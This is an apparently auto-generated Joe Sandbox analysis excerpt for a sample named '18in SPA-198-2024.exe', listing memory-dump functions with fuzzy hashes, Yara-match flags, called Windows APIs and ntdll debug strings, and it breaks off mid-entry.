Source File: 00000000.00000002.2037131496.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb72f0cc2546d528384fc04b76b2791397e44d1d1286ab858baf41837cdf5435
Instruction ID: dde1be306138402fc974b33f4f13e9653e83a9b44171a5251548816ba78306d1
Opcode Fuzzy Hash: fb72f0cc2546d528384fc04b76b2791397e44d1d1286ab858baf41837cdf5435
Instruction Fuzzy Hash: 00210771504208EFDB06DF94D5C0F36BB66FB84314F20C56DEA094B256C33AD806DAA1

Function 00AFD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037131496.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23b7a0c920e4d4bac6c281eecb183f18926601615de5883e790be2dbea25b79
Instruction ID: b04aefa1666cb7ed3193413b62df023798e7497404d10c178fce7972c7d2655d
Opcode Fuzzy Hash: f23b7a0c920e4d4bac6c281eecb183f18926601615de5883e790be2dbea25b79
Instruction Fuzzy Hash: 5E2180755093848FCB03CF24D994715BF72EB46314F28C5EAD9498B6A7C33A980ACB62

Function 00AED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037093480.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 848c6ddd4f61dd636631b2eff2a0b1cd8b7e77b70ffd40fae264c908ad221f19
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 1F11E676504280CFCB16CF14D9C4B16BF71FB98314F24C6A9D9490B656C336D85ACBA2

Function 00AED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037093480.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: e5ae9ceeae6b9254712205706e3c3c2bd3902783bb3c7c1c5899fa816abb0c2a
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 4F112676404280CFCB02CF00D5C4B16BF71FBA4324F24C6A9D9090B256C33AE85ACBA2

Function 00AFD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037131496.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_afd000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 3fe7a7da3a617e116619e13f9e1df58add717d0397b9e64f9960318ab5dca680
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 1A11BB75504284DFCB02CF50C5C4B25BBA2FB84314F24C6AAE9494B296C33AD80ACBA2

Function 00AED745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037093480.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f35582199a5c2f95d0da274b96b2b5eade6179dc24a3347e0e4be68f2ca33a
Instruction ID: 7607fc7084adec2901f3b9cb8b92a597571785e3e8615a79b6a5c3a371eb8bbb
Opcode Fuzzy Hash: a1f35582199a5c2f95d0da274b96b2b5eade6179dc24a3347e0e4be68f2ca33a
Instruction Fuzzy Hash: 3301DB710043849EE7209F57CD84B67BFACEF46324F18C56AED594E286D2799841CA71

Function 00AED744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037093480.0000000000AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aed000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aae2455c345de621611b49858da5c405da4b6304922fa6d15221ad36dfc45b9
Instruction ID: c9b4fd0761d6c6210dbbee283001253172a9651a9e1eca991b49c0552a66635a
Opcode Fuzzy Hash: 2aae2455c345de621611b49858da5c405da4b6304922fa6d15221ad36dfc45b9
Instruction Fuzzy Hash: B1F062714043849AE7108F16CD88B62FFA8EF96734F18C45AED484E286C2799844CBB1

Non-executed Functions

Function 088B9CA0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf952a743d051531ac618437aaaa61e931127f438c5391521728ee6a34a9e8af
Instruction ID: 1288d6c8f9f0819f16dc6e97567efd3f3a80163e6f1e66e4df6d463abfe31f1f
Opcode Fuzzy Hash: cf952a743d051531ac618437aaaa61e931127f438c5391521728ee6a34a9e8af
Instruction Fuzzy Hash: 7EE10A74E005198FCB14DFA9C9809AEFBB2FF89305F24C169D918AB356D731A942CF61

Function 00B4DB8C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2037239609.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1073abce6575835492cae2931963e8b15cf6e9ed5c6764c5f94bac59e64e8b
Instruction ID: bddf56427f4b8b2a154982495d28ef446bf33206e09fdc14633c2b13e42deb11
Opcode Fuzzy Hash: 1a1073abce6575835492cae2931963e8b15cf6e9ed5c6764c5f94bac59e64e8b
Instruction Fuzzy Hash: B6A16132E002168FCF05DFB5C8849AEB7F2FF85300B1585BAE805AB266DB75DA55DB40

Function 088BAB48 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 991c54f8d13737cc3a040d6169370f77751e2ce7da48afb0201bfbb67ac4ec63
Instruction ID: abc9188ff5bef66bf6de07a5cfd7927eea4e6c107dc75234685fe02883261fe8
Opcode Fuzzy Hash: 991c54f8d13737cc3a040d6169370f77751e2ce7da48afb0201bfbb67ac4ec63
Instruction Fuzzy Hash: F0716D75E016198FCB08DFAAC5849DEFBF2BF88311F14D16AD818AB355DB34A942CB50

Function 088BAB39 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042603066.00000000088B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 088B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_88b0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6f42639e038ed32f7f0576b66352c606cd788bbb6a3790acc1682cc5b22537
Instruction ID: 7a2c7be0cf9036464857807795e8d932705bb2adb0c97f9927bd2dd6e5b0b6db
Opcode Fuzzy Hash: 8c6f42639e038ed32f7f0576b66352c606cd788bbb6a3790acc1682cc5b22537
Instruction Fuzzy Hash: EF517D75E016188FDB08DFAAC984ADEFBF2BF88311F14C16AD419AB354DB3499428F50

Analysis Process: 18in SPA-198-2024.exePID: 5816, Parent PID: 6200COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.1%
Signature Coverage:	8.8%
Total number of Nodes:	137
Total number of Limit Nodes:	12

Executed Functions

Function 00417563 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction ID: bdce513adcdf66a5ddf40d0a2ecde4d7099c94072a20f6ffb4ae009ad51faa44
Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
Instruction Fuzzy Hash: B00171B1E0020DBBDF10DBE1DC42FDEB379AB54308F4081AAE90897241F634EB588B95

Function 0042C433 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C467

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction ID: 37a102a096cf0697ac499042812ebe3be0a6e3a94df1b2a833282852239f11ec
Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction Fuzzy Hash: 7DE04F766002147BD620BA5AEC41F97775CDFC5714F00801AFA0867282C675791087F5

Function 01252B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01252B6A

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d83bda1979ddc01d40bb147fad0ee235645b253f88c01249398a3f92ea4d6669
Instruction ID: 53dcbb4890904f016ee4f0539649c143fddaa8278edb106abb9c9c44b814cb31
Opcode Fuzzy Hash: d83bda1979ddc01d40bb147fad0ee235645b253f88c01249398a3f92ea4d6669
Instruction Fuzzy Hash: EF9002A12125004341057158441461A400E97E0201B55C021E6014594DC5258DD16225

Function 01252DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01252DFA

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd2ca955e429a096c1e605327d4e2779d94f50a07d94e4551e31bff3df378c81
Instruction ID: ddadd982008dd0c3582b2ae3fb77c4fb723416ef9ace9f7f5fc98771b7459f5a
Opcode Fuzzy Hash: bd2ca955e429a096c1e605327d4e2779d94f50a07d94e4551e31bff3df378c81
Instruction Fuzzy Hash: 7190027121150453D1117158450470B000D97D0241F95C412A542455CDD6568E92A221

Function 01252C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01252C7A

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 265d192879d02d6a85b1dbe8b8d25a0e96a9d314521490e03d72335ddac8128d
Instruction ID: 2421918ad524549274c5b173578f7221ffd6ff103f56670bfad72f401d162dee
Opcode Fuzzy Hash: 265d192879d02d6a85b1dbe8b8d25a0e96a9d314521490e03d72335ddac8128d
Instruction Fuzzy Hash: FB90027121158842D1107158840474E000997D0301F59C411A942465CDC6958DD17221

Function 012535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012535CA

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fcf2988936fb3179e0c2e7197fb282a2df73a89303974366466ec01ef21f1434
Instruction ID: 9e202fa21d73b18c6a081f93ba37c6df63e5644dabe98c6bd4694e1132cf1b1d
Opcode Fuzzy Hash: fcf2988936fb3179e0c2e7197fb282a2df73a89303974366466ec01ef21f1434
Instruction Fuzzy Hash: 2C90027161560442D1007158451470A100997D0201F65C411A542456CDC7958E9166A2

Function 00413D7A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ea64OHKq, xrefs: 00413E91, 00413E94
Ea64OHKq, xrefs: 00413E7F, 00413E89, 00413E9A

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID:
String ID: Ea64OHKq$Ea64OHKq
API String ID: 0-1999359540
Opcode ID: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
Instruction ID: 41e09621a5d42bbcee0aa685c486dca4cf25d64e691113f71131abf1b070321e
Opcode Fuzzy Hash: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
Instruction Fuzzy Hash: BE310F336043019FC710CE68ACC69EAB769EF85B1570445ABE144CF3A2E2298F83C788

Function 00413E0F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A

Strings

Ea64OHKq, xrefs: 00413E91, 00413E94
Ea64OHKq, xrefs: 00413E7F, 00413E89, 00413E9A

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Ea64OHKq$Ea64OHKq
API String ID: 1836367815-1999359540
Opcode ID: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
Instruction ID: 62f55432ef48320368bfc7655e925e1af4bb88519bc3667248631d0393ebb683
Opcode Fuzzy Hash: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
Instruction Fuzzy Hash: 5C012671D0021C7AEB11ABE58C82DEF7B7CDF413A8F048169FA14AB241D67D4E068BB1

Function 00413E13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A

Strings

Ea64OHKq, xrefs: 00413E91, 00413E94
Ea64OHKq, xrefs: 00413E7F, 00413E89, 00413E9A

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: Ea64OHKq$Ea64OHKq
API String ID: 1836367815-1999359540
Opcode ID: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
Instruction ID: 832b8f0f82de43865680b143cd41517b910a90eb7c2e8913e91f4129158ae345
Opcode Fuzzy Hash: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
Instruction Fuzzy Hash: 10012671D0021C7AEB11AAE18C81DEF7B7CDF40398F048029FA0467241D57D4E058BB5

Function 0041760F Relevance: 1.5, APIs: 1, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction ID: 244a9be35222bc483ccb875c85ee509224bce84f5c57bb6526cc21583e77dac4
Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
Instruction Fuzzy Hash: 81F062B1E04109BADF10DBA0DC91FDEB775AF14705F444266E80497641F635E7888795

Function 00417624 Relevance: 1.5, APIs: 1, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction ID: 3da201fd3e5f4a38d3ab40cb9ffbd160d6eadf765e117ee62af733f6e3875303
Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
Instruction Fuzzy Hash: BDF09E39699B086BC3118BB998057C9B7E4FF42900F294198DDC9C6E53E363821AC781

Function 0042C763 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E354,?,?,00000000,?,0041E354,?,?,?), ref: 0042C7A2

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction ID: 8478ad7e8697ef7acc63e2c8c0b0e70c508952faf178b19bb78cdc86ac20e0b7
Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction Fuzzy Hash: 18E06DB27042047FD610EE59EC45F9B73ACEFC5714F004019F908A7282D770B9108AB5

Function 0042C7B3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,00416E48,000000F4), ref: 0042C7EF

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction ID: 0103aceadb78e79b7ecc8faacede7f1e09fa23b9d57152ecbc1c1368217fcbeb
Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
Instruction Fuzzy Hash: 6DE06DB17002047BD610EE59EC81F9B33ADDFC5710F004019FE08A7241D671B9108AB9

Function 0042C803 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,355104C2,?,?,355104C2), ref: 0042C837

Memory Dump Source

Source File: 00000004.00000002.2247487130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_18in SPA-198-2024.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
Instruction ID: f8c1995de4c57a0dc7d95be7e0574ee260bed641c46f1d5501e4473e89b5d8ab
Opcode Fuzzy Hash: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
Instruction Fuzzy Hash: F9E04F756442147FD120BA9ADC41F97776CDFC5714F40401AFA1C67241C674790487F4

Function 01252C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01252C24

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7fac117fff3a96680f257ae8f7e4440a634fedbbefbd3d809df47770ad9b87ad
Instruction ID: e720c60ffbe95012909ae3f2309eee601de1945d2212726321f68efdbe78b514
Opcode Fuzzy Hash: 7fac117fff3a96680f257ae8f7e4440a634fedbbefbd3d809df47770ad9b87ad
Instruction Fuzzy Hash: 04B09B719115D5C5DB51E764460871B790477D0701F16C061D7030645F4738C5D1E375

Non-executed Functions

Function 01292349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MaxDeadActivationContexts, xrefs: 01292D82
DisableExceptionChainValidation, xrefs: 0129275F
GlobalFlag2, xrefs: 01292FC0
UnloadEventTraceDepth, xrefs: 012924C0
LdrpInitializeExecutionOptions, xrefs: 0129317D
minkernel\ntdll\ldrinit.c, xrefs: 01293187
UseImpersonatedDeviceMap, xrefs: 0129251C
ExecuteOptions, xrefs: 012925A0
FrontEndHeapDebugOptions, xrefs: 01292489
DisableHeapLookaside, xrefs: 0129246D
RaiseExceptionOnPossibleDeadlock, xrefs: 01292579
@, xrefs: 01292942
GlobalFlag, xrefs: 01292F3F, 01293059
MaxLoaderThreads, xrefs: 012924EC
@, xrefs: 01292B74
MinimumStackCommitInBytes, xrefs: 01292BB0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01293176
ShutdownFlags, xrefs: 012924A1
TracingFlags, xrefs: 01292549
CFGOptions, xrefs: 01292967

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 04ed8ca29b05aa7950db5a974df0e29611c3951d2dfc5b7c3df61c95ddacb958
Instruction ID: 686c2b059733735f5686235bae20dbda368d54727850211252facf6b4ffe3969
Opcode Fuzzy Hash: 04ed8ca29b05aa7950db5a974df0e29611c3951d2dfc5b7c3df61c95ddacb958
Instruction Fuzzy Hash: 16928D71624342EFEB25CE29C881B6BB7E8BB84754F04492DFB94D7291D770E844CB92

Function 01248620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section address, xrefs: 01285425, 012854BC, 01285534
Critical section address., xrefs: 01285502
Invalid debug info address of this critical section, xrefs: 012854B6
Thread identifier, xrefs: 0128553A
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012854E2
undeleted critical section in freed memory, xrefs: 0128542B
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012854CE
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0128540A, 01285496, 01285519
8, xrefs: 012852E3
Thread is in a state in which it cannot own a critical section, xrefs: 01285543
Address of the debug info found in the active list., xrefs: 012854AE, 012854FA
double initialized or corrupted critical section, xrefs: 01285508
corrupted critical section, xrefs: 012854C2
Critical section debug info address, xrefs: 0128541F, 0128552E

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 0e4baa9acca402b7ad5834e51438a7b190d5c02d4635f50a8884b1628976ab30
Instruction ID: 2c55846228be0c280c3298aa9e676f8ec891403a99523f6c6275363b466349e6
Opcode Fuzzy Hash: 0e4baa9acca402b7ad5834e51438a7b190d5c02d4635f50a8884b1628976ab30
Instruction Fuzzy Hash: 4F81A9B1A51349AFDB25CF9AC845BAEBBF9FB08B14F10415DF604B7290D3B5A940CB60

Function 012429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01282506
@, xrefs: 0128259B
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012822E4
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01282602
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01282409
RtlpResolveAssemblyStorageMapEntry, xrefs: 0128261F
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01282624
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012825EB
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01282412
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01282498
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012824C0

Memory Dump Source

Source File: 00000004.00000002.2248135325.00000000011E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11e0000_18in SPA-198-2024.jbxd

Similarity

API ID:
